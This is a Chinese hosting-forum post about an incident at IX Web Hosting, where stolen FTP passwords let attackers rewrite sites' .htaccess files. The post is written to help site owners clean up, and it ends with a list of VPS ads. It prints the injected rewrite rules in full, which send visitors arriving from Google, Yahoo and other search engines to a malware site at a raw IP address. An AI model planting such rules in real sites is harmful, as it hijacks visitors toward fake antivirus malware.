关于IXwebhosting上出现的安全问题
![]() | ![]() | ![]() | ![]() |
| 【性价之王】 | 【线路之王】 | 【价格之王】 | 【配置之王】 |
| 【免费之王】 | 【香港首推】 | 【梯子之王】 | 【独服之王】 |
症状:直接进入网站没有问题,从google等国外著名搜索引擎进入网站就会转向到一个病毒网站。
具体例子请看: http://bbs.idcspy.com/thread-36706-1-1.html
原因: 网站的.htaccess文件被修改,会加入如下代码:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://89.28.13.202/in.html?s=ix [R,L]
上面的代码就是判断访问者来源,如果是来自上面那些搜索引擎,就自动转向
解决方法: 修正.htaccess,并且去掉.htaccess的写入权限。同时修正根目录的权限,去掉写入权限。
来自IXwebhosting官方的信息,此安全隐患已经得到修正,他们也杀掉了服务器上大部分此类病毒,如果还有问题,请联系ixwebhosting检查。被感染的原因可能是由于你的ftp密码被盗,进而被修改网站文件。
下面是ixwebhosting关于此问题发给用户的信件:
In our ongoing commitment to the security of our customers, we have discovered a vulnerability located within many of our client’s websites, including yours. This is a self replicating virus which is found by visiting well-known search engines. When you click on any link it may redirect you to a fake Anti-Virus 2009 website which appears to scan your system and then asks you to download the software. Once downloaded and installed it begins displaying pop ups on your desktop. At this time it collects your FTP user name and password from your own computer and uses that information to upload an exploited file named “.htaccess” to your website. Any visitors to your website will then be redirected to the fake anti-virus website.
We have dedicated our systems administration team to finding a solution to this and are happy to say that as one of the first hosting companies we have successfully cleaned all instances of this virus from our servers more than a week ago, and are continually scanning them to ensure your site does not become re-infected.
While your website is now secure, your computer may still be at risk. Here are two easy steps that will detect and remove this malicious software from your computer and make sure your website will not spread the virus again:
1. Uninstall the fake Anti-Virus software by following the instructions at this link:
http://www.bleepingcomputer.com/ … tall-antivirus-2009
2. Once removed, change your FTP password from within your web hosting control panel. Once logged in, click on the FTP Manager icon and then on the icon next to the password to change it.
To illustrate the severity of the issue I would like to share some facts with you:
* 26,991 of our customers have been infected with fake Anti-Virus 2009
* 79,469 websites have been spreading the Anti-Virus 2009 infection
* 120,923 malicious files have been removed from our system
We are constantly monitoring our servers for potential threats to your website, and are proud to say that we are among the first web hosts to identify this particular problem, and have been the first to offer a resolution. Your continued and safe presence on the internet is our top priority.
If you have questions regarding any of this information, please contact our support team anytime.
Kind Regards,
Fatima Said, CCO
IX Web Hosting
猜你可能想看的VPS
- 特价服务器 ZJI→终身 7 折独立服务器 可选日本和香港 国内速度飞快独立服务器[U]
- 一般-魔方云国庆促销→美国 CN2 GIA 终身 9 折 超大带宽 速度美国VPS[主机]
- Bootstrap fileinput 插件实现批量上传一次请求的办法全球[VPS测评]
- AlexHost→€11.8 年 1.5GB 内存 10GB SSD 空虚拟空间(主机)
- Hosteons→首付 8 折 免费升级套餐 KVM 或者 OpenVZ全球[VPS测评]
- 没有用过-MoeVM→139 元 月 上海 CN2 服务器 500G 流全球[VPS测评]
- 疯狂猜成语 图猜成语三个人每个人拿着虎的一部分是什么成语?全球[VPS测评]
- 浩瀚星辰→1750 元 月 8 核 2GB 内存 120GB 空间 不限虚拟空间(主机)
- imidc→全场 VPS 一律 5 折 香港 VPS 台湾 VPS 日本日本VPS[主机]
- DiyVM→69 元 月 XEN-2GB 50GB 2M 香港 CN2 香港VPS[主机]
- SmartHost→$6.95 月 KVM-1GB 内存 1TB 硬盘 全球[VPS测评]
- DogYun→圣何塞 CN2 GIA 线路经典云月付 15.6 元起 动全球[VPS测评]
- 百度高速下载神器PanDownload2.0.6更新 功能更强大全球[VPS测评]
- 腾讯云新春采购节2019 - 每天五场2折秒杀/满减代金券/云产品三折全球[VPS测评]
- OneVPS KVM VPS终身 75 折优惠码 日本VPS最低月付3.日本VPS[主机]
- BuyVM → 拉斯维加斯 性能充足 无限流量 → 2美金每月全球[VPS测评]
- 快速云:云服务器vps的区别是什么云服务器和vps哪个比较好2022-0全球[VPS测评]
- CubeCloud,靠谱的香港cn2vps,美国cn2终身九折,原生IP美国VPS[主机]
- 好云:国内云服务器2核2G5M优惠,仅350元/年;香港/海外云服务器,香港VPS[主机]
- 金斗云双12活动:全场8折起,美国圣何塞CN2 GIA高防VPS20元/美国VPS[主机]
- 无忧云:香港大埔/荃湾云服务器5折优惠,可叠加优惠码,国内高防78元起香港VPS[主机]
- 95IDC :香港vps优惠活动,1核2G月付折后25元;香港物理机低至香港VPS[主机]
- 腾讯云香港/韩国/日本免备案服务器优惠促销活动日本VPS[主机]
- 月神科技:香港云服务器,2核2G5M年付200元/年;美国2核2G50M美国VPS[主机]
- 如何设置必应api 自动推送网站全球[VPS测评]
- 磐逸云怎么样?1核1G香港安畅CN2 VPS带宽5M年付128元香港VPS[主机]
- Pia云:美国三网CN2 GIA线路,15元/月起;香港云主机1核/2G美国VPS[主机]
- 腾讯云美国硅谷服务器/香港/新加坡:1核1G(Linux)云服务器仅28美国VPS[主机]
- 岚云:香港安迅/沙田CN2直连,75折起,1核/1G/30G SSD/1香港VPS[主机]
- 腾讯云香港服务器需要备案吗?腾讯云香港轻量服务器优惠活动香港VPS[主机]
转载请注明原文地址:http://140.238.13.167:12355/read-105198.html











